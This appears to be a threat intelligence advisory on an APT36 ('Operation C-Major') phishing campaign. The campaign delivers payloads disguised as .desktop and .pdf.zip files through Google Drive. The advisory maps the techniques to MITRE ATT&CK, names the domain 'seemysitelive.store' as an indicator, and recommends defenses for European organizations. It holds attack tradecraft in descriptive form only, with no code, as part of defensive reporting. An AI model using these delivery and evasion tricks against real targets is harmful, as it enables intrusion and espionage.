This investigation report details a malware campaign attributed to the threat actor group APT36, also known as "Operation C-Major." The campaign leverages phishing techniques to deliver malicious payloads disguised as desktop entry files (.desktop) and compressed PDF files (.pdf.zip). The attack vector involves social engineering via phishing emails that entice victims to open these malicious files. The payload delivery mechanism notably uses Google Drive as a hosting platform, which helps evade traditional detection methods by leveraging a trusted cloud service for payload distribution. The malware employs multiple sophisticated tactics consistent with MITRE ATT&CK techniques, including scripting (T1064), masquerading (T1036), hidden files and directories (T1564.001), and the creation of malicious Windows services (T1543.003) to maintain persistence. The campaign also involves brute force attempts (T1110) and software discovery (T1518) to expand access and reconnaissance within compromised environments. Network communications utilize both application layer protocols (T1071) and non-application layer protocols (T1095), sometimes over non-standard ports (T1571), complicating network detection. Indicators of compromise include domains such as "seemysitelive.store," associated IP addresses, WebSocket URLs, and multiple file hashes linked to the malicious payloads. The campaign's medium severity rating reflects the moderate impact potential and the complexity of exploitation, which requires user interaction (opening malicious attachments) but does not currently have known exploits in the wild or available patches. The threat actor's use of legitimate cloud services for payload delivery and advanced evasion techniques underscores the need for vigilant detection and response capabilities.

For European organizations, this APT36 campaign poses a significant risk primarily through targeted phishing attacks that can lead to initial compromise and subsequent lateral movement within networks. The use of Google Drive for payload hosting may bypass traditional email and web filtering solutions, increasing the likelihood of successful delivery. Once inside, the malware's ability to establish persistence via Windows services and hide its presence can lead to prolonged undetected access, data exfiltration, and potential espionage activities. The campaign's brute force and software discovery techniques could enable attackers to escalate privileges and map critical infrastructure, threatening confidentiality and integrity of sensitive data. Disruption of availability is possible if the malware disables security controls or critical services. European organizations with remote workforces or those heavily reliant on cloud services may be particularly vulnerable. The medium severity suggests a moderate but credible threat that could impact sectors such as government, defense, critical infrastructure, and enterprises handling sensitive procurement or operational data, especially if targeted by APT36 due to geopolitical interests.

To mitigate this threat effectively, European organizations should implement targeted phishing awareness and training programs emphasizing the risks of opening unsolicited attachments, especially those with unusual file extensions like .desktop or compressed PDFs. Email security gateways should be configured to detect and block suspicious attachments and URLs, including those pointing to cloud storage services like Google Drive. Endpoint detection and response (EDR) solutions must be tuned to identify behaviors associated with scripting, masquerading, and unauthorized Windows service creation. Network monitoring should include anomaly detection for non-standard port usage and unusual WebSocket connections, such as those to the domain "seemysitelive.store." Multi-factor authentication (MFA) should be enforced to reduce the risk from brute force attacks. Regular audits of user privileges and software inventories can limit the attack surface and detect unauthorized changes. Incident response plans should incorporate procedures for rapid containment and forensic analysis of phishing-related compromises. Additionally, organizations should collaborate with threat intelligence sharing platforms to stay updated on emerging indicators and tactics related to APT36.